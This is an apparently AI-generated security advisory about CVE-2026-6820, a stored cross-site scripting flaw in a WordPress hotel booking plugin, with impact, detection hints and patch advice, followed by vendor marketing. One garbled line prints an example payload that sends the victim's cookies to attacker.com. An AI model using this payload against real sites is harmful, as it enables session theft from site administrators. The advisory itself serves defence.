
PEACH
Un cadre d’isolation des locataires
CVE-2026-6820 is a Stored Cross-Site Scripting (XSS) vulnerability in the VikBooking Hotel Booking Engine & PMS plugin for WordPress, affecting all versions up to and including 1.8.8. The flaw arises from insufficient input sanitization and output escaping of the email parameter, enabling unauthenticated attackers to inject persistent malicious scripts into pages served to other users. It was published on July 8, 2026, with a patch available in version 1.8.9. The vulnerability carries a CVSS v3.1 base score of 7.2 (High) (GitHub Advisory, Wordfence).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The email parameter accepted by the plugin's front-end and admin controllers is not properly sanitized before being stored, nor properly escaped before being rendered in HTML output. An unauthenticated attacker can submit a crafted booking or contact request containing a malicious JavaScript payload in the email field; the payload is then stored in the database and executed in the browser of any user who subsequently views the affected page. The fix was applied in version 1.8.9, as visible in the patched controller files (GitHub Advisory, Plugin Trac - site controller, Plugin Trac - admin controller).
Successful exploitation allows an unauthenticated attacker to persistently inject arbitrary JavaScript into pages viewed by site administrators or other authenticated users, enabling session token theft, credential harvesting, content defacement, and execution of unauthorized actions on behalf of legitimate users. Because no user interaction is required from the attacker (only from the victim visiting the injected page), the attack surface is broad for any WordPress site running the affected plugin. The scope is marked as Changed, meaning the injected script can affect resources beyond the plugin itself, including the broader WordPress environment (GitHub Advisory, Wordfence).
email parameter."><script>document.location='https://attacker.com/steal?c='+document.cookie</script>email field.email parameter values containing <script>, javascript:, or URL-encoded equivalents (e.g., %3Cscript%3E); admin page access logs showing repeated visits to booking detail pages followed by outbound connections.Update the VikBooking Hotel Booking Engine & PMS plugin to version 1.8.9 or later, which includes fixes for input sanitization in both the site and admin controllers (Plugin Trac - site controller, Plugin Trac - admin controller). As interim mitigations, deploy a Web Application Firewall (WAF) configured to block XSS payloads in form submissions, and restrict access to booking management pages to trusted IP ranges where feasible. Audit other plugin parameters for similar unsanitized inputs and review stored booking data for any existing malicious entries (Wordfence).
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."